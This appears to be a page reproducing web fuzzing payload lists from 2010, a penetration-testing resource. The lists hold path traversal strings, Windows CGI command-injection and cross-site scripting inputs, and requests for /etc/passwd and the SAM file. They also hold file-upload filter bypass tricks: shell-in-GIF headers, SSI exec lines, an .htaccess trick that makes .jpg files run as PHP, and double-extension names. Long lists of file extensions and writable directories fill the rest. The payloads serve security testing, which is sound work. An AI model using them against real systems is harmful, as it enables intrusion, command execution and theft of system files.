.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}<br />
./../{FILE}<br />
./.././../{FILE}<br />
./.././.././../{FILE}<br />
./.././.././.././../{FILE}<br />
./.././.././.././.././../{FILE}<br />
./.././.././.././.././.././../{FILE}<br />
./.././.././.././.././.././.././../{FILE}<br />
./.././.././.././.././.././.././.././../{FILE}<br />
.\..\{FILE}<br />
.\..\.\..\{FILE}<br />
.\..\.\..\.\..\{FILE}<br />
.\..\.\..\.\..\.\..\{FILE}<br />
.\..\.\..\.\..\.\..\.\..\{FILE}<br />
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}<br />
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}<br />
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}<br />
.//..//{FILE}<br />
.//..//.//..//{FILE}<br />
.//..//.//..//.//..//{FILE}<br />
.//..//.//..//.//..//.//..//{FILE}<br />
.//..//.//..//.//..//.//..//.//..//{FILE}<br />
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}<br />
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}<br />
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}<br />
.\\..\\{FILE}<br />
.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}<br />
../{FILE}<br />
../..//{FILE}<br />
../..//../{FILE}<br />
../..//../..//{FILE}<br />
../..//../..//../{FILE}<br />
../..//../..//../..//{FILE}<br />
../..//../..//../..//../{FILE}<br />
../..//../..//../..//../..//{FILE}<br />
..\{FILE}<br />
..\..\\{FILE}<br />
..\..\\..\{FILE}<br />
..\..\\..\..\\{FILE}<br />
..\..\\..\..\\..\{FILE}<br />
..\..\\..\..\\..\..\\{FILE}<br />
..\..\\..\..\\..\..\\..\{FILE}<br />
..\..\\..\..\\..\..\\..\..\\{FILE}<br />
..///{FILE}<br />
../..///{FILE}<br />
../..//..///{FILE}<br />
../..//../..///{FILE}<br />
../..//../..//..///{FILE}<br />
../..//../..//../..///{FILE}<br />
../..//../..//../..//..///{FILE}<br />
../..//../..//../..//../..///{FILE}<br />
..\\\{FILE}<br />
..\..\\\{FILE}<br />
..\..\\..\\\{FILE}<br />
..\..\\..\..\\\{FILE}<br />
..\..\\..\..\\..\\\{FILE}<br />
..\..\\..\..\\..\..\\\{FILE}<br />
..\..\\..\..\\..\..\\..\\\{FILE}<br />
..\..\\..\..\\..\..\\..\..\\\{FILE}<br />
</pre><br />
<br />
=== Common Windows CGI (Update: 17 March 2010 - Total Statements: 76) ===<br />
<pre># Common Windows CGI (Update: 17 March 2010 <br />
# fuzz inside executable directories<br />
# on windows, this is usually /scripts or /cgi-bin<br />
# adam.muntner@quietmove.com<br />
<br />
cart32.exe<br />
get32.exe<br />
visadmin.exe<br />
foxweb.exe<br />
webplus.exe?about<br />
fpsrvadm.exe<br />
MsmMask.exe<br />
cmd.exe?/c+dir<br />
cmd1.exe?/c+dir<br />
post32.exe|dir%20c:\\<br />
cgitest.exe<br />
hpnst.exe?c=p+i=<br />
Pbcgi.exe<br />
testcgi.exe<br />
webfind.exe?keywords=01234567890123456789<br />
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C<br />
test-cgi.exe?<script>alert(document.cookie)</script><br />
athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['<br />
mkilog.exe<br />
mkplog.exe<br />
MsmMask.exe?mask=/junk334<br />
MsmMask.exe?mask=/junk334<br />
MsmMask.exe?mask=/junk334<br />
MsmMask.exe?mask=/junk334<br />
MsmMask.exe?mask=/junk334<br />
perl.exe?-v<br />
perl.exe<br />
ppdscgi.exe<br />
c32web.exe/ChangeAdminPassword<br />
windmail.exe<br />
dbmlparser.exe<br />
cgimail.exe<br />
minimal.exe<br />
rguest.exe<br />
visitor.exe<br />
webbbs.exe<br />
wguest.exe<br />
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15<br />
cfgwiz.exe<br />
Cgitest.exe<br />
mailform.exe<br />
post16.exe<br />
imagemap.exe<br />
htimage.exe/path/filename?2,2<br />
htimage.exe<br />
Webnews.exe<br />
texis.exe/junk<br />
apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/<br />
sensepost.exe?/c+dir<br />
testcgi.exe<br />
testcgi.exe?<script>alert(document.cookie)</script><br />
ion-p.exe?page=c:\winnt\repair\sam<br />
../../../../../../../../../../WINNT/system32/ipconfig.exe<br />
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe<br />
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe<br />
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf <br />
foxweb.dll<br />
wconsole.dll<br />
shtml.dll<br />
scripts/slxweb.dll/getfile?type=Library&file=[invalid filename]<br />
rightfax/fuwww.dll/?<br />
WINDMAIL.EXE?%20-n%20c:\boot.ini%<br />
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\<br />
GW5/GWWEB.EXE<br />
GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA<br />
GW5/GWWEB.EXE?HELP=bad-request<br />
GWWEB.EXE?HELP=bad-request<br />
echo.bat<br />
echo.bat?&dir+c:\\<br />
hello.bat?&dir+c:\\<br />
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\<br />
input2.bat?|dir<br />
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\<br />
test-cgi.bat<br />
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\<br />
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,<br />
</pre><br />
<br />
=== File Upload Filter Bypass (Update: 17 March 2010 - notes only) ===<br />
<pre># File Upload Fuzzfile - File Name Filter Bypass<br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
<br />
# For MIME filter bypass, your shellscript should look like<br />
# -------<br />
# GIF89aP;<br />
# [shell]<br />
# -------<br />
#<br />
# For mod_cgi Server Side Include upload attacks<br />
#<br />
#<!--#exec cmd="ls" --><br />
#<br />
#or, on Windows<br />
#<br />
#<!--#exec cmd="dir" --><br />
#<br />
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumberated on the servers, and try the commonly writable directory fuzzfile.<br />
#<br />
# example .htaccess that sets mime type .jpg to be executable:<br />
# -----<br />
# AddType application/x-httpd-php .jpg<br />
# -----<br />
</pre><br />
<br />
=== Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2) ===<br />
<pre># Cross-Platform File Upload Filter Bypass Appends (Update: 17 March 2010<br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
<br />
%00index.html<br />
;index.html<br />
</pre><br />
<br />
=== PHP-Specific Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7) ===<br />
<pre># PHP-Specific File Upload Filter Bypass Appends (Update: 17 March 2010 - notes<br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
# also: use "gim" to create a .jpg image with the meta comment field set to:<br />
# -----<br />
#<?php phpinfo(); ?> <br />
#-----<br />
<br />
{PHPSCRIPT}<br />
{PHPSCRIPT}.phtml<br />
{PHPSCRIPT}.php.html<br />
{PHPSCRIPT}.php::$DATA<br />
{PHPSCRIPT}.php.php.rar <br />
{PHPSCRIPT}.php.rar<br />
{PHPSCRIPT}.php.doc<br />
{PHPSCRIPT}.php.xls<br />
{PHPSCRIPT}.php.xlsx<br />
{PHPSCRIPT}.php.pdf<br />
{PHPSCRIPT}.php.jpeg<br />
{PHPSCRIPT}.php.gif<br />
{PHPSCRIPT}.php.zip<br />
</pre><br />
<br />
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14) ===<br />
<pre># Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends (Update: 17 March 2009<br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
<br />
{ASPSCRIPT}<br />
{ASPSCRIPT};<br />
{ASPSCRIPT};.jpg<br />
{ASPSCRIPT};.pdf<br />
{ASPSCRIPT};.html<br />
{ASPSCRIPT};.htm<br />
{ASPSCRIPT};.txt<br />
{ASPSCRIPT};.xyz<br />
{ASPSCRIPT};.zip<br />
{ASPSCRIPT};.tgz<br />
{ASPSCRIPT};.doc<br />
{ASPSCRIPT};.docx<br />
{ASPSCRIPT};.xls<br />
{ASPSCRIPT};.xlsx<br />
</pre><br />
<br />
=== Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9) ===<br />
<pre>#Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends (Update: 17 March 2010) <br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
<br />
{HOST}/templates_compiled/<br />
{HOST}/templates_c/<br />
{HOST}/templates/<br />
{HOST}/temporary/<br />
{HOST}/images/<br />
{HOST}/cache/<br />
{HOST}/temp/<br />
{HOST}/files/<br />
{HOST}/tmp/<br />
</pre><br />
<br />
=== Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863) ===<br />
<pre><br />
#Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863<br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
<br />
<pre><br />
.$er<br />
.123<br />
.1pe<br />
.1ph<br />
.3dr<br />
.3dt<br />
.3me<br />
.3pe<br />
.4dl<br />
.4dv<br />
.8xk<br />
.^^^<br />
.a3l<br />
.a3m<br />
.a3w<br />
.a4l<br />
.a4m<br />
.a4w<br />
.a5l<br />
.a5w<br />
.a65<br />
.aao<br />
.ab<br />
.ab1<br />
.ab2<br />
.ab3<br />
.abcd<br />
.abi<br />
.abp<br />
.aby<br />
.aca<br />
.acc<br />
.accdb<br />
.acf<br />
.acg<br />
.ade<br />
.adp<br />
.adt<br />
.adx<br />
.aft<br />
.agd<br />
.aifb<br />
.alc<br />
.ald<br />
.ali<br />
.amb<br />
.amsorm<br />
.an1<br />
.anme<br />
.apr<br />
.arc<br />
.arh<br />
.ask<br />
.asm<br />
.ast<br />
.at5<br />
.att<br />
.aw<br />
.awg<br />
.azw<br />
.bafl<br />
.bci<br />
.bcm<br />
.bdf<br />
.bdic<br />
.bfx<br />
.bgl<br />
.bgt<br />
.bin<br />
.bjo<br />
.bk<br />
.bkk<br />
.blb<br />
.bld<br />
.blg<br />
.bok<br />
.box<br />
.brd<br />
.brw<br />
.btf<br />
.btif<br />
.btm<br />
.btr<br />
.cap<br />
.cat<br />
.cbg<br />
.cch<br />
.ccr<br />
.cct<br />
.cdb<br />
.cdd<br />
.cdf<br />
.cdp<br />
.cdr<br />
.cdx<br />
.cel<br />
.celtx<br />
.chg<br />
.chk<br />
.chn<br />
.ckd<br />
.ckt<br />
.cl2<br />
.cl4<br />
.clb<br />
.clix<br />
.clm<br />
.clp<br />
.cmbl<br />
.cna<br />
.contact<br />
.cpi<br />
.cpmz<br />
.crd<br />
.crtx<br />
.csa<br />
.csv<br />
.ctf<br />
.ctt<br />
.cursorfx<br />
.curxptheme<br />
.cvd<br />
.cvn<br />
.cwk<br />
.cws<br />
.cwz<br />
.cxt<br />
.cyo<br />
.cys<br />
.daf<br />
.dal<br />
.dam<br />
.das<br />
.dat<br />
.data<br />
.db<br />
.db2<br />
.db3<br />
.dbc<br />
.dbd<br />
.dbf<br />
.dbx<br />
.dcf<br />
.dcl<br />
.dcm<br />
.dcmd<br />
.ddc<br />
.ddcx<br />
.ddt<br />
.dem<br />
.des<br />
.dex<br />
.dfm<br />
.dfproj<br />
.dft<br />
.dgb<br />
.dif<br />
.dii<br />
.dlg<br />
.dm2<br />
.dmo<br />
.dmsk<br />
.dnc<br />
.dockzip<br />
.dp1<br />
.dpn<br />
.dpx<br />
.drl<br />
.dsb<br />
.dsd<br />
.dsk<br />
.dsy<br />
.dsz<br />
.dt0<br />
.dt1<br />
.dt2<br />
.dta<br />
.dtr<br />
.dvdproj<br />
.dvo<br />
.dwi<br />
.e00<br />
.eap<br />
.ebuild<br />
.ec0<br />
.eco<br />
.ecx<br />
.edb<br />
.edf<br />
.eep<br />
.efx<br />
.egp<br />
.emb<br />
.emd<br />
.emlxpart<br />
.enc<br />
.enw<br />
.epp<br />
.epub<br />
.epw<br />
.er1<br />
.esp<br />
.ess<br />
.est<br />
.esx<br />
.et<br />
.eta<br />
.etd<br />
.etl<br />
.ev<br />
.ev3<br />
.evt<br />
.evy<br />
.exif<br />
.exp<br />
.exx<br />
.fa<br />
.fasta<br />
.fbl<br />
.fcd<br />
.fcs<br />
.fdb<br />
.ffd<br />
.ffwp<br />
.fhc<br />
.fid<br />
.fil<br />
.flame<br />
.fll<br />
.flo<br />
.flp<br />
.flt<br />
.fm<br />
.fm5<br />
.fmp<br />
.fo<br />
.fob<br />
.fol<br />
.fop<br />
.fox<br />
.fp<br />
.fp3<br />
.fp4<br />
.fp5<br />
.fp7<br />
.frl<br />
.frm<br />
.fro<br />
.frx<br />
.fsb<br />
.fsc<br />
.ftm<br />
.ftw<br />
.gan<br />
.gbr<br />
.gc<br />
.gcx<br />
.gdb<br />
.ged<br />
.gedcom<br />
.gen<br />
.ggb<br />
.gml<br />
.gms<br />
.gno<br />
.gnp<br />
.gp3<br />
.gpi<br />
.gps<br />
.gpx<br />
.gra<br />
.grade<br />
.grf<br />
.grib<br />
.grk<br />
.grr<br />
.grv<br />
.gs<br />
.gst<br />
.gtp<br />
.gwk<br />
.gxl<br />
.hcc<br />
.hce<br />
.hci<br />
.hcp<br />
.hcr<br />
.hcu<br />
.hda<br />
.hdb<br />
.hdf<br />
.hdi<br />
.hdl<br />
.hif<br />
.hl<br />
.hml<br />
.hmt<br />
.hs2<br />
.hsk<br />
.hst<br />
.htg<br />
.huh<br />
.hyv<br />
.i5z<br />
.ib<br />
.ics<br />
.id2<br />
.idx<br />
.igc<br />
.ihx<br />
.ii<br />
.iif<br />
.img<br />
.imt<br />
.ink<br />
.inp<br />
.ins<br />
.ip<br />
.irock<br />
.irr<br />
.irx<br />
.isf<br />
.itdb<br />
.itl<br />
.itm<br />
.itn<br />
.itw<br />
.itx<br />
.ivt<br />
.iw<br />
.ixb<br />
.jasper<br />
.jdb<br />
.jef<br />
.jmp<br />
.jnt<br />
.job<br />
.joboptions<br />
.joined<br />
.jph<br />
.jrprint<br />
.jrxml<br />
.jude<br />
.kap<br />
.kdb<br />
.kid<br />
.kismac<br />
.kmz<br />
.kpf<br />
.kpp<br />
.kpr<br />
.kpx<br />
.kpz<br />
.l<br />
.l6t<br />
.laccdb<br />
.lbl<br />
.lbx<br />
.lcd<br />
.lcf<br />
.lcm<br />
.ldif<br />
.lex<br />
.lgc<br />
.lgf<br />
.lgh<br />
.lgi<br />
.lgl<br />
.lib<br />
.lif<br />
.livereg<br />
.liveupdate<br />
.lix<br />
.llb<br />
.lms<br />
.lmx<br />
.lnt<br />
.loc<br />
.lp7<br />
.lrf<br />
.lrs<br />
.lrx<br />
.lsf<br />
.lsl<br />
.lsp<br />
.lsr<br />
.lst<br />
.lsu<br />
.lvm<br />
.lw4<br />
.ly<br />
.m<br />
.mag<br />
.mai<br />
.map<br />
.masseffectprofile<br />
.mat<br />
.mbb<br />
.mbf<br />
.mbg<br />
.mbl<br />
.mbp<br />
.mbx<br />
.mc1<br />
.mc9<br />
.mcd<br />
.md<br />
.mdb<br />
.mdc<br />
.mdf<br />
.mdl<br />
.mdm<br />
.mdn<br />
.mdt<br />
.mdx<br />
.mdz<br />
.mem<br />
.menc<br />
.met<br />
.mex<br />
.mfo<br />
.mfp<br />
.mgc<br />
.mls<br />
.mm<br />
.mmap<br />
.mmc<br />
.mmf<br />
.mmp<br />
.mnc<br />
.mng<br />
.mnk<br />
.mno<br />
.mny<br />
.mobi<br />
.moho<br />
.mosaic<br />
.mox<br />
.mpd<br />
.mpj<br />
.mpp<br />
.mpt<br />
.mpx<br />
.mpz<br />
.mq4<br />
.ms10<br />
.mth<br />
.mtw<br />
.mud<br />
.muf<br />
.mw<br />
.mwf<br />
.mws<br />
.mwx<br />
.mxd<br />
.myd<br />
.myi<br />
.nb<br />
.nc<br />
.ndf<br />
.ndk<br />
.ndx<br />
.net<br />
.neta<br />
.nfo<br />
.nitf<br />
.nmind<br />
.not<br />
.notebook<br />
.np<br />
.npl<br />
.npt<br />
.nrl<br />
.ns2<br />
.ns3<br />
.ns4<br />
.nsf<br />
.ntx<br />
.numbers<br />
.nvl<br />
.nyf<br />
.oab<br />
.obj<br />
.odb<br />
.odf<br />
.odp<br />
.ods<br />
.odx<br />
.oeaccount<br />
.ofc<br />
.ofm<br />
.oft<br />
.ofx<br />
.omcs<br />
.omp<br />
.ond<br />
.one<br />
.oo3<br />
.opf<br />
.opx<br />
.or2<br />
.or3<br />
.or4<br />
.or5<br />
.or6<br />
.org<br />
.orx<br />
.otf<br />
.otl<br />
.otln<br />
.ots<br />
.out<br />
.ov2<br />
.ova<br />
.ovf<br />
.p96<br />
.p97<br />
.pab<br />
.paf<br />
.pan<br />
.pbd<br />
.pc<br />
.pcap<br />
.pcb<br />
.pcr<br />
.pd4<br />
.pd5<br />
.pdas<br />
.pdb<br />
.pdd<br />
.pdm<br />
.pds<br />
.pdx<br />
.peb<br />
.pec<br />
.pep<br />
.pex<br />
.pfc<br />
.pfl<br />
.phb<br />
.phm<br />
.pi<br />
.pis<br />
.pjx<br />
.pka<br />
.pkb<br />
.pkh<br />
.pks<br />
.pkt<br />
.pln<br />
.plw<br />
.pmo<br />
.pmr<br />
.pnproj<br />
.pnpt<br />
.pns<br />
.pnt<br />
.pod<br />
.poi<br />
.pos<br />
.postal<br />
.pot<br />
.potm<br />
.potx<br />
.pp2<br />
.ppf<br />
.pps<br />
.ppsx<br />
.ppt<br />
.pptm<br />
.pptx<br />
.prc<br />
.pre<br />
.prf<br />
.prj<br />
.prm<br />
.prs<br />
.psa<br />
.psf<br />
.psm<br />
.pst<br />
.ptb<br />
.ptf<br />
.ptk<br />
.ptm<br />
.ptn<br />
.ptt<br />
.ptz<br />
.pvl<br />
.pwd<br />
.pxj<br />
.pxl<br />
.q07<br />
.q08<br />
.q09<br />
.q3d<br />
.qbw<br />
.qdat<br />
.qdf<br />
.qdfm<br />
.qel<br />
.qfx<br />
.qif<br />
.qpb<br />
.qpf<br />
.qph<br />
.qpm<br />
.qpw<br />
.qrp<br />
.qsd<br />
.ral<br />
.rbt<br />
.rcd<br />
.rcg<br />
.rdb<br />
.rdf<br />
.rdx<br />
.ref<br />
.ret<br />
.rf1<br />
.rfa<br />
.rfo<br />
.rge<br />
.rgn<br />
.rgo<br />
.rmuf<br />
.rnq<br />
.rod<br />
.rog<br />
.roi<br />
.rou<br />
.rpp<br />
.rpt<br />
.rrt<br />
.rsc<br />
.rsd<br />
.rsw<br />
.rte<br />
.rvt<br />
.rwg<br />
.rzb<br />
.s85<br />
.saf<br />
.sam07<br />
.sar<br />
.sav<br />
.sbd<br />
.sbf<br />
.sbq<br />
.sbt<br />
.sca<br />
.scf<br />
.sch<br />
.sdb<br />
.sdc<br />
.sdf<br />
.sdp<br />
.sdq<br />
.sds<br />
.sen<br />
.seo<br />
.seq<br />
.ser<br />
.sgml<br />
.sgn<br />
.shp<br />
.shs<br />
.shx<br />
.skc<br />
.skv<br />
.skx<br />
.sle<br />
.slk<br />
.slp<br />
.snapfireshow<br />
.sonic<br />
.soundpack<br />
.spo<br />
.sps<br />
.spub<br />
.spv<br />
.sq<br />
.sqd<br />
.sql<br />
.sqlite<br />
.sqr<br />
.sta<br />
.stc<br />
.stf<br />
.stk<br />
.stl<br />
.stm<br />
.stp<br />
.str<br />
.stt<br />
.stw<br />
.styk<br />
.stykz<br />
.swk<br />
.sxc<br />
.sxi<br />
.sy3<br />
.t01<br />
.t02<br />
.t03<br />
.t04<br />
.t05<br />
.t06<br />
.t07<br />
.t08<br />
.t09<br />
.t2<br />
.t3001<br />
.tax2008<br />
.tax2009<br />
.tb<br />
.tbk<br />
.tbl<br />
.tcc<br />
.tcx<br />
.tda<br />
.tdl<br />
.tdm<br />
.tdt<br />
.te<br />
.te3<br />
.teacher<br />
.tef<br />
.tet<br />
.tfa<br />
.tfd<br />
.tfrd<br />
.tjp<br />
.tk3<br />
.tkfl<br />
.tmw<br />
.tol<br />
.topc<br />
.tpb<br />
.tps<br />
.tr3<br />
.tra<br />
.trd<br />
.trk<br />
.trs<br />
.trx<br />
.tst<br />
.tsv<br />
.ttk<br />
.txa<br />
.txd<br />
.txf<br />
.uccapilog<br />
.ud<br />
.udb<br />
.udeb<br />
.uds<br />
.ulf<br />
.ulz<br />
.update<br />
.upoi<br />
.usr<br />
.uvf<br />
.uwl<br />
.val<br />
.vbpf1<br />
.vcd<br />
.vce<br />
.vcf<br />
.vcs<br />
.vdb<br />
.vdx<br />
.vfs<br />
.vi<br />
.vip<br />
.vle<br />
.vlg<br />
.vmt<br />
.voi<br />
.vok<br />
.vrd<br />
.vscontent<br />
.vsx<br />
.vtx<br />
.vxml<br />
.w02<br />
.wab<br />
.wb1<br />
.wb2<br />
.wb3<br />
.wdb<br />
.wdq<br />
.wea<br />
.wfd<br />
.wfm<br />
.wgp<br />
.wgt<br />
.windowslivecontact<br />
.wjr<br />
.wk1<br />
.wk2<br />
.wk3<br />
.wk4<br />
.wk5<br />
.wke<br />
.wki<br />
.wks<br />
.wku<br />
.wlmp<br />
.wmdb<br />
.wor<br />
.wpc<br />
.wpf<br />
.wpo<br />
.wq1<br />
.wq2<br />
.wtb<br />
.wtr<br />
.xbk<br />
.xdb<br />
.xdp<br />
.xds<br />
.xef<br />
.xem<br />
.xfd<br />
.xfo<br />
.xft<br />
.xl<br />
.xlc<br />
.xlgc<br />
.xlr<br />
.xls<br />
.xlsb<br />
.xlsm<br />
.xlsx<br />
.xlt<br />
.xltm<br />
.xltx<br />
.xlw<br />
.xmcd<br />
.xml<br />
.xmlper<br />
.xmpz<br />
.xpg<br />
.xpj<br />
.xpm<br />
.xpt<br />
.xrp<br />
.xsl<br />
.xslt<br />
.xsn<br />
.xtm<br />
.xtp<br />
.xxd<br />
.yam<br />
.zap<br />
.zdb<br />
.zdc<br />
.zix<br />
.zmc<br />
.zpl<br />
.{pb<br />
.~hm<br />
</pre><br />
<br />
=== Compressed File Types - (Update: 16 March 2010 - Total Statements: 187) ===<br />
<pre><br />
# Compressed File Types - (Update: 16 March 2010 - Total Statements: 187)<br />
# adam.muntner@quietmove.com<br />
# creative commons<br />
<br />
.0<br />
.000<br />
.7z<br />
.a00<br />
.a01<br />
.a02<br />
.ace<br />
.ain<br />
.alz<br />
.apz<br />
.ar<br />
.arc<br />
.arh<br />
.ari<br />
.arj<br />
.ark<br />
.axx<br />
.b64<br />
.ba<br />
.bh<br />
.boo<br />
.bz<br />
.bz2<br />
.bzip<br />
.bzip2<br />
.c00<br />
.c01<br />
.c02<br />
.car<br />
.cb7<br />
.cbr<br />
.cbt<br />
.cbz<br />
.cp9<br />
.cpgz<br />
.cpt<br />
.dar<br />
.dd<br />
.deb<br />
.dgc<br />
.dist<br />
.ecs<br />
.efw<br />
.epi<br />
.f<br />
.fdp<br />
.gca<br />
.gz<br />
.gzi<br />
.gzip<br />
.ha<br />
.hbc<br />
.hbc2<br />
.hbe<br />
.hki<br />
.hki1<br />
.hki2<br />
.hki3<br />
.hpk<br />
.hyp<br />
.ice<br />
.ipg<br />
.ipk<br />
.ish<br />
.j<br />
.jar.pack<br />
.jgz<br />
.jic<br />
.kgb<br />
.lbr<br />
.lemon<br />
.lha<br />
.lnx<br />
.lqr<br />
.lz<br />
.lzh<br />
.lzm<br />
.lzma<br />
.lzo<br />
.lzx<br />
.md<br />
.mint<br />
.mou<br />
.mpkg<br />
.mzp<br />
.oar<br />
.p7m<br />
.pack.gz<br />
.package<br />
.pae<br />
.pak<br />
.paq6<br />
.paq7<br />
.paq8<br />
.par<br />
.par2<br />
.pbi<br />
.pcv<br />
.pea<br />
.pet<br />
.pf<br />
.pim<br />
.pit<br />
.piz<br />
.pkg<br />
.pup<br />
.puz<br />
.pwa<br />
.qda<br />
.r0<br />
.r00<br />
.r01<br />
.r02<br />
.r03<br />
.r1<br />
.r2<br />
.r30<br />
.rar<br />
.rev<br />
.rk<br />
.rnc<br />
.rp9<br />
.rpm<br />
.rte<br />
.rz<br />
.rzs<br />
.s00<br />
.s01<br />
.s02<br />
.s7z<br />
.sar<br />
.sdc<br />
.sdn<br />
.sea<br />
.sen<br />
.sfs<br />
.sfx<br />
.sh<br />
.shar<br />
.shk<br />
.shr<br />
.sit<br />
.sitx<br />
.spt<br />
.sqx<br />
.sqz<br />
.tar<br />
.tar.gz<br />
.tar.xz<br />
.taz<br />
.tbz<br />
.tbz2<br />
.tg<br />
.tgz<br />
.tlz<br />
.tlzma<br />
.txz<br />
.tz<br />
.uc2<br />
.uha<br />
.vem<br />
.vsi<br />
.wad<br />
.war<br />
.wot<br />
.xef<br />
.xez<br />
.xmcdz<br />
.xpi<br />
.xx<br />
.xz<br />
.y<br />
.yz<br />
.z<br />
.z01<br />
.z02<br />
.z03<br />
.z04<br />
.zap<br />
.zfsendtotarget<br />
.zip<br />
.zipx<br />
.zix<br />
.zoo<br />
.zpi<br />
.zz</pre><br />
<br />
=== Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284) ===<br />
<pre><br />
# Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284)<br />
# adam.muntner@quietmove.com<br />
# creative commons<br />
<br />
.3me<br />
.3pe<br />
.4dl<br />
.8xk<br />
.^^^<br />
.aao<br />
.ab2<br />
.aca<br />
.accdb<br />
.acf<br />
.acg<br />
.agd<br />
.an1<br />
.anme<br />
.arc<br />
.arh<br />
.ast<br />
.att<br />
.aw<br />
.bafl<br />
.bdf<br />
.bfx<br />
.bjo<br />
.bld<br />
.blg<br />
.btf<br />
.btif<br />
.btr<br />
.cct<br />
.cdb<br />
.cdd<br />
.cdf<br />
.cdp<br />
.cdr<br />
.chk<br />
.ckd<br />
.cl2<br />
.cl4<br />
.clb<br />
.clix<br />
.clm<br />
.cmbl<br />
.contact<br />
.cpi<br />
.cpmz<br />
.csv<br />
.cwz<br />
.cxt<br />
.daf<br />
.dat<br />
.data<br />
.db<br />
.dcf<br />
.ddt<br />
.dex<br />
.dif<br />
.dmsk<br />
.dnc<br />
.dpx<br />
.dsd<br />
.dt1<br />
.dt2<br />
.dta<br />
.e00<br />
.ec0<br />
.edf<br />
.eep<br />
.efx<br />
.enc<br />
.enw<br />
.epw<br />
.est<br />
.et<br />
.eta<br />
.ev3<br />
.exif<br />
.exp<br />
.fbl<br />
.fdb<br />
.fid<br />
.fol<br />
.gdb<br />
.gen<br />
.gnp<br />
.gpi<br />
.gpx<br />
.hcp<br />
.hdf<br />
.hmt<br />
.hsk<br />
.htg<br />
.id2<br />
.ii<br />
.img<br />
.ink<br />
.ins<br />
.irr<br />
.irx<br />
.iw<br />
.jdb<br />
.jnt<br />
.job<br />
.jrprint<br />
.kmz<br />
.lbx<br />
.lex<br />
.lgf<br />
.lgl<br />
.lib<br />
.liveupdate<br />
.lnt<br />
.lst<br />
.m<br />
.masseffectprofile<br />
.mat<br />
.mbb<br />
.mdb<br />
.mem<br />
.menc<br />
.met<br />
.mmf<br />
.mng<br />
.mpd<br />
.mpp<br />
.ms10<br />
.muf<br />
.mw<br />
.mwf<br />
.mwx<br />
.nc<br />
.ndx<br />
.nfo<br />
.not<br />
.ns2<br />
.ns3<br />
.ns4<br />
.ntx<br />
.numbers<br />
.ods<br />
.oeaccount<br />
.omcs<br />
.or2<br />
.or3<br />
.or4<br />
.or5<br />
.orx<br />
.out<br />
.ov2<br />
.ovf<br />
.paf<br />
.pbd<br />
.pcr<br />
.pdb<br />
.pdx<br />
.peb<br />
.pec<br />
.pfc<br />
.pis<br />
.pln<br />
.pnpt<br />
.pns<br />
.pnt<br />
.pos<br />
.postal<br />
.pps<br />
.ppsx<br />
.ppt<br />
.pptm<br />
.pptx<br />
.pre<br />
.prf<br />
.psa<br />
.psf<br />
.pst<br />
.ptz<br />
.q07<br />
.q3d<br />
.qbw<br />
.qdat<br />
.qdf<br />
.qfx<br />
.qpf<br />
.qpw<br />
.qsd<br />
.rcd<br />
.rdx<br />
.ref<br />
.rmuf<br />
.roi<br />
.rrt<br />
.rvt<br />
.rwg<br />
.saf<br />
.sam07<br />
.sbd<br />
.sbf<br />
.sbq<br />
.sbt<br />
.sdb<br />
.sdc<br />
.sdf<br />
.sds<br />
.ser<br />
.sgn<br />
